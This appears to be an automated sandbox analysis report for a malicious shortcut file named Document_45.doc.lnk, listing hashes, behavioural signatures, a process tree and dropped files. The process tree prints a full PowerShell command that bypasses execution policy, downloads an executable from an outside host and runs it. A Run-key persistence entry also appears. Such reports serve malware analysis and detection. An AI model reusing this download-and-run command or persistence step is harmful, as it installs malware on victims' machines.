Resubmissions
29/08/2023, 12:14
230829-pellfafd41 1028/08/2023, 06:52
230828-hneqxsaf5t 1028/08/2023, 01:20
230828-bp4ywaed58 10Analysis
-
max time kernel
158s -
max time network
162s -
platform
windows7_x64 -
resource
win7-20230712-en -
resource tags
arch:x64arch:x86image:win7-20230712-enlocale:en-usos:windows7-x64system -
submitted
28/08/2023, 06:52
Static task
static1
Behavioral task
behavioral1
Sample
Document_45/Document_45.doc.lnk
Resource
win7-20230712-en
Behavioral task
behavioral2
Sample
Document_45/Document_45.doc.lnk
Resource
win10v2004-20230703-en
General
-
Target
Document_45/Document_45.doc.lnk
-
Size
1KB
-
MD5
c7eb920f5717b5911ca1565067a5a314
-
SHA1
aad1960e04ce48f707fe297e17eeb0cbe2ddbb83
-
SHA256
b3dac534d0ce19efdf1aa37718283318e94a82446b3fad721076bb63f427eee3
-
SHA512
5baab10dfe542581f4ec2e38fd5481c2d6d69192c6775de5e2326e73b3547d46a61608fae55082f184ef1c5d613358bfcca067c18514668d9842e95be6d7533b
Malware Config
Extracted
http://twizt.net/s.exe
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 5 2872 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 2 IoCs
pid Process 2444 windrv.exe 620 winsvc.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Service = "C:\\Windows\\winsvc.exe" windrv.exe -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 7 icanhazip.com 9 ip-api.com -
Drops file in Windows directory 2 IoCs
description ioc Process File created C:\Windows\winsvc.exe windrv.exe File opened for modification C:\Windows\winsvc.exe windrv.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 2872 powershell.exe 2872 powershell.exe 2872 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2872 powershell.exe -
Suspicious use of WriteProcessMemory 14 IoCs
description pid Process procid_target PID 2528 wrote to memory of 2916 2528 cmd.exe 29 PID 2528 wrote to memory of 2916 2528 cmd.exe 29 PID 2528 wrote to memory of 2916 2528 cmd.exe 29 PID 2916 wrote to memory of 2872 2916 cmd.exe 30 PID 2916 wrote to memory of 2872 2916 cmd.exe 30 PID 2916 wrote to memory of 2872 2916 cmd.exe 30 PID 2872 wrote to memory of 2444 2872 powershell.exe 31 PID 2872 wrote to memory of 2444 2872 powershell.exe 31 PID 2872 wrote to memory of 2444 2872 powershell.exe 31 PID 2872 wrote to memory of 2444 2872 powershell.exe 31 PID 2444 wrote to memory of 620 2444 windrv.exe 34 PID 2444 wrote to memory of 620 2444 windrv.exe 34 PID 2444 wrote to memory of 620 2444 windrv.exe 34 PID 2444 wrote to memory of 620 2444 windrv.exe 34
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\Document_45\Document_45.doc.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:2528 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell.exe ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://twizt.net/s.exe','C:\Users\Admin\windrv.exe');Start-Process 'C:\Users\Admin\windrv.exe'2⤵
- Suspicious use of WriteProcessMemory
PID:2916 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://twizt.net/s.exe','C:\Users\Admin\windrv.exe');Start-Process 'C:\Users\Admin\windrv.exe'3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2872 -
C:\Users\Admin\windrv.exe"C:\Users\Admin\windrv.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:2444 -
C:\Windows\winsvc.exeC:\Windows\winsvc.exe5⤵
- Executes dropped EXE
PID:620
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
216B
MD583fef87e909f90e1e7d5b56ebccc2957
SHA1656d634b48434d8e523fa7705a92dcaa561d9763
SHA25681c1d8b377d6a9c1bcbf94231081707afb86aaa776433f2242203121bb1e15ff
SHA512d76d0b75f7cd9a4aec14dce6cf9e606139f3810dbdaa4d9a1ae297ec43b69e3ab0595ed6a66e56c7f99c76e380bd7496e0861285489f94dfc34a630bc5a82e0b
-
Filesize
17KB
MD5eee0836b7e86e19c5d090c23b7014282
SHA17decf13272c0759c905aebcf8c077b905ec277c3
SHA256eb4f2de4089ecb8da49febc02ff2ef37a46191fe11a39a33e4389125024a0bcc
SHA512c9ee9f57e63e677b84a34b9f89422c45c8117f7b73338e3c93e89701eacc35908cce63ef31f59d64a6de57379252d092484ca6353cfdc294af9c78bf34c0ca05
-
Filesize
17KB
MD5eee0836b7e86e19c5d090c23b7014282
SHA17decf13272c0759c905aebcf8c077b905ec277c3
SHA256eb4f2de4089ecb8da49febc02ff2ef37a46191fe11a39a33e4389125024a0bcc
SHA512c9ee9f57e63e677b84a34b9f89422c45c8117f7b73338e3c93e89701eacc35908cce63ef31f59d64a6de57379252d092484ca6353cfdc294af9c78bf34c0ca05
-
Filesize
17KB
MD5eee0836b7e86e19c5d090c23b7014282
SHA17decf13272c0759c905aebcf8c077b905ec277c3
SHA256eb4f2de4089ecb8da49febc02ff2ef37a46191fe11a39a33e4389125024a0bcc
SHA512c9ee9f57e63e677b84a34b9f89422c45c8117f7b73338e3c93e89701eacc35908cce63ef31f59d64a6de57379252d092484ca6353cfdc294af9c78bf34c0ca05
-
Filesize
17KB
MD5eee0836b7e86e19c5d090c23b7014282
SHA17decf13272c0759c905aebcf8c077b905ec277c3
SHA256eb4f2de4089ecb8da49febc02ff2ef37a46191fe11a39a33e4389125024a0bcc
SHA512c9ee9f57e63e677b84a34b9f89422c45c8117f7b73338e3c93e89701eacc35908cce63ef31f59d64a6de57379252d092484ca6353cfdc294af9c78bf34c0ca05